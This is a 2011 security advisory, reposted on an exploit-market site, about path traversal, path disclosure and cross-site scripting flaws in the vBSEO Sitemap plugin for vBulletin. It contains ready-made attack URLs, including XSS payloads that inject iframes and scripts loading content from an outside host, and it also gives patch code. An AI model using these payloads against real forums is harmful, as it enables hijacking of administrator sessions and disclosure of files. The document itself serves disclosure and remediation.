[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities

Author
MaXe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15340
Category
web applications
Date add
30-01-2011
Platform
php
Versions Affected: 2.5 and 3.0 (Most likely all versions)
 
Info:
A proven success record, vBSEO powers the most optimized forums on the Web.
The #1 SEO plugin and the only professional, fully supported solution. A full
package of SEO enhancements, one install, one upgrade.
 
External Links:
http://www.vbseo.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Please see the details below.
 
vBSEO Sitemap 3.0 Gold:
Enumeration and confirmation of files:
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt
 
Proof of Concept XSS: (Non-Persistent)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
 
Path Disclosure: (any file in the addon directory - includes fatal errors)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links3.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbagallery.php
 
----------------------- END OF vBSEO 3.0 -----------------------
 
vBSEO Sitemap 2.5: (initial first release)
 
Enumeration and confirmation of files:
http://www.target.tld/vbseo_sitemap/index.php?details=../../robots.txt
http://www.target.tld/vbseo_sitemap/index.php?hitdetails=../../../robots.txt
 
Non-Persistent XSS: (PoC)
http://www.target.tld/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E
[May require bot hits to work!] http://www.target.tld/vbseo_sitemap/index.php?removedl[0]=&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E
http://www.target.tld/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
 
Path Disclosure: (any file in the addon directory - includes fatal errors)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php
http://www.target.tld/includes/functions_vbseo_url.php
 
----------------------- END OF vBSEO 2.5 -----------------------
 
vBSEO Sitemap: (Most likely all versions)
Persistent XSS:
1) The user-agent is not sanitized in a sufficient way allowing an attacker to inject persistent scripts.
2) Then the attacker must request the sitemap via one of the following links:
- http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true
- http://www.target.tld/vbulletin/upload/vbseo_sitemap/vbseo_getsitemap.php?sitemap=sitemap_index.xml.gz
 
3) Then an authenticated administrator must view one of the pages containing the injected and potentially malicious user-agent:
http://www.target.tld/vbseo_sitemap/index.php?dlist=true&page=357
 
 
[!] All vulnerabilities requires authentication and they do not survive a login screen, making them almost harmless.
 
 
-:: Solution ::-
Before: (file: index.php within vbseo_sitemap) -- Version 2.5
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td align="right"><?php echo $sdate?></td>
        <td><?php echo $dl['sitemap']?></td>
        <td><b><?php echo $dl['ua']?></b></td>
        <td><?php echo $dl['ip']?></td>
        <td><?php echo $dl['useragent']?></td>
        <td>
<a href="index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$
        </td>
        <td>
<input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>">
        </td>
</tr>
 
After:_______________________________________________________
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td align="right"><?php echo $sdate?></td>
        <td><?php echo $dl['sitemap']?></td>
        <td><b><?php echo $dl['ua']?></b></td>
        <td><?php echo $dl['ip']?></td>
        <td><?php echo htmlentities($dl['useragent'])?></td>
        <td>
<a href="index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$
        </td>
        <td>
<input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>">
        </td>
</tr>
---------------------------------------------------------------------------------------------
 
Before: (file: index.php within vbseo_sitemap) -- Version 3.0
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>">
 
After:_______________________________________________________
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td>
        <td class="<?php echo $dd%2?'alt1':'alt2'?>">
     
---------------------------------------------------------------------------------------------
 
In addition, vbseo_getsitemap.php which grabs the unsanitized user-agent can also be fixed by finding this line:
'useragent'=>$_SERVER['HTTP_USER_AGENT'],
 
And changing it to this:
'useragent'=>htmlentities($_SERVER['HTTP_USER_AGENT']),
 
 
 
Disclosure Information:
- Vulnerability found and researched: ~27th December 2010
- Semi-Disclosed at InterN0T: 30th December
- Detailed Disclosure: 31st January 2011



#  0day.today [2024-12-24]  #